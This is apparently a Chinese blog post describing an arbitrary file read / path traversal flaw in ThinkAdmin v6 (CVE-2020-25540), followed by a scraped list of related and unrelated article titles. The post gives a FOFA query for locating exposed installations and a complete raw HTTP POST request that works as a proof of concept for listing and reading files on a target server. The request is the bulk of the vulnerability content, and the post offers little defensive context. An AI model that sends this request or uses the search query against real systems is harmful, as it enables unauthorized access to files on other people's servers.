简述

ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统

漏洞描述

ThinkAdmin6版本存在路径遍历漏洞。该漏洞主要是因为api中存在危险函数,没有任何过滤。攻击者可利用该漏洞通过请求编码参数任意读取远程服务器上的任意文件。

漏洞复现

fofa搜索语句 app="ThinkAdmin"
POC

POST /admin/login.html/?s=admin/api.Update/node HTTP/1.1
Host: 127.0.0.1
Content-Length: 21
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://139.159.192.181
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://139.159.192.181/admin/login.html/?s=admin/api.Update/node
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=f54b3a7d1d63edc5a264133ef6865e95
Connection: closerules=%5B%22%2F%22%5D


ThinkAdmin任意文件读取漏洞(CVE-2020-25540)相关推荐

  1. gitlab 更新文件_GitLab任意文件读取漏洞公告

    2020年4月28日,GitLab的一个任意文件读取漏洞的漏洞细节被公开.该漏洞补丁于2020年3月26号由GitLab官方发布.深信服安全研究团队依据漏洞重要性和影响力进行评估,作出漏洞通告. 漏洞 ...

  2. CISCO ASA任意文件读取漏洞复现 (CVE-2020-3452)

    CISCO ASA任意文件读取漏洞复现 (CVE-2020-3452) 一.漏洞描述: Cisco Adaptive Security Appliance (ASA) 防火墙设备以及Cisco Fir ...

  3. CVE-2021-43798 Grafana 未经授权的任意文件读取漏洞

    CVE-2021-43798 Grafana 未经授权的任意文件读取漏洞 目录 漏洞原理 漏洞信息 受影响版本 FOFA搜集相关资产 漏洞分析&漏洞复现 解决方案 漏洞原理 Grafana是一 ...

  4. php 打开任意文件下载,TEC-004-php文件下载任意文件读取漏洞修复

    修改download?u参数值,将/public/files/14842030529.txt,替换为../../../../../../../../../../etc/passwd function ...

  5. 安全研究 | Jenkins 任意文件读取漏洞分析

    欢迎大家前往腾讯云+社区,获取更多腾讯海量技术实践干货哦~ 本文由云鼎实验室 发表于云+社区专栏 一.漏洞背景 漏洞编号:CVE-2018-1999002 漏洞等级:高危 Jenkins 7 月 18 ...

  6. .exp文件_mini_httpd 任意文件读取漏洞(附EXP脚本)

    一.环境搭建: 进入镜像目录: cd vulhub/mini_httpd/CVE-2018-18778 启动环境: docker-compose up -d 访问8088端口 二.漏洞描述: Mini ...

  7. phpcms前台注入导致任意文件读取漏洞

    关于:phpcms前台注入导致任意文件读取漏洞的修复问题 简介: phpcms的/phpcms/modules/content/down.php文件中,对输入参数 $_GET['a_k']未进行严格过 ...

  8. Grafana 中存在严重的未授权任意文件读取漏洞,已遭利用

     聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 Grafana Labs 发布紧急安全更新,修复了影响该公司主产品 Grafana 仪表盘中的严重漏洞 (CVE-2021-43798),CVS ...

  9. php mail执行命令,PHPMailer 命令执行 任意文件读取漏洞利用 【含POC】

    PHPMailer 命令执行漏洞(CVE-2016-10033) 漏洞编号:CVE-2016-10033 影响版本:PHPMailer< 5.2.18 漏洞级别: 高危 漏洞POC: PHPMa ...

最新文章

  1. PHP 读写TXT与Mysql性能测试
  2. Vue 脚手架||Vue 脚手架的基本用法
  3. PIC32单片机harmony开发环境搭建并新建harmony工程
  4. javaWeb服务详解(含源代码,测试通过,注释) ——applicationContext.xml
  5. 社团管理信息系统C语言,学生社团信息管理系统.doc
  6. 学术谱系树:来看看你导师的师承
  7. 最大似然估计_R初等统计分析(一)——概率分布、最大似然估计
  8. 团队作业——系统设计和任务分配
  9. C# RabbitMQ(一)介绍
  10. 电流检测时运放的偏置电流对精度的影响
  11. NXP iMX8 ARM平台Distro Boot使用
  12. 软文管家发布平台_企业软文如何做好
  13. 【随笔】第一批走进大学的“00后”群体——纪念2015级西安交大少年班
  14. Linux驱动——mmc bus浅析(五)
  15. verilog 锁存器
  16. html平行四边形标签,平行四边形
  17. intellij IDEA 中,.properties文件unicode转中文
  18. 【c++篇】c++常见容器中list的模拟实现
  19. POI实现 Excel插入图片
  20. 基于51单片机的火灾报警系统设计

热门文章

  1. 看看世界各地的摄影图片,换换心情。
  2. 2021广东高考一分一段表排名成绩查询,2021年广东春季高考一分一段排名及分数段数据公布...
  3. 关于实现手机号,身份证号加密解密解决方案
  4. 上海人才大数据 | 上下班1小时,年薪30万(附图表)
  5. 如何删除第一张单页_如何使用小情书APP制作自己的情书
  6. exception日志 php_一次php错误日志的问题排查
  7. 命名数据网络(NDN)与TCP/IP网络
  8. 基于VMware的虚拟机资源池实现(上)-创建资源池
  9. 谈谈两个以太坊硬分叉
  10. 基于nand flash的文件系统的整理